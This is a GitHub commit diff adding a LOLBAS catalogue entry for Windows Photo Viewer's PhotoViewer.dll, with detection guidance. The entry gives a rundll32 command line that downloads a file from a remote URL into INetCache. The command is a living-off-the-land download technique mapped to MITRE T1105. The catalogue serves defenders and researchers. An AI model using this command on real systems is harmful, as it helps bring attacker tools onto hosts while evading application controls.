Skip to content

Commit 526e40f

Browse files
1 parent e385cdc commit 526e40f

File tree

1 file changed

+25
-0
lines changed

1 file changed

+25
-0
lines changed

_lolbas/Libraries/PhotoViewer.md

Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,25 @@
1+
---
2+
Name: PhotoViewer.dll
3+
Description: Windows Photo Viewer
4+
Author: Avihay Eldad
5+
Created: 2025-06-22
6+
Commands:
7+
- Command: rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll",ImageView_Fullscreen {REMOTEURL}
8+
Description: Once executed, rundll32.exe will download the file at the specified URL to the user's INetCache folder using the Windows Photo Viewer DLL.
9+
Usecase: Download file from remote location.
10+
Category: Download
11+
Privileges: User
12+
MitreID: T1105
13+
OperatingSystem: Windows 10, Windows 11
14+
Tags:
15+
- Download: INetCache
16+
Full_Path:
17+
- Path: C:\Program Files\Windows Photo Viewer\PhotoViewer.dll
18+
- Path: C:\Program Files (x86)\Windows Photo Viewer\PhotoViewer.dll
19+
Detection:
20+
- IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a remote URL (containing '://') as an argument
21+
Acknowledgement:
22+
- Person: Avihay Eldad
23+
Handle: '@avihayeldad'
24+
- Person: Tommy Warren
25+
---

0 commit comments

Comments
 (0)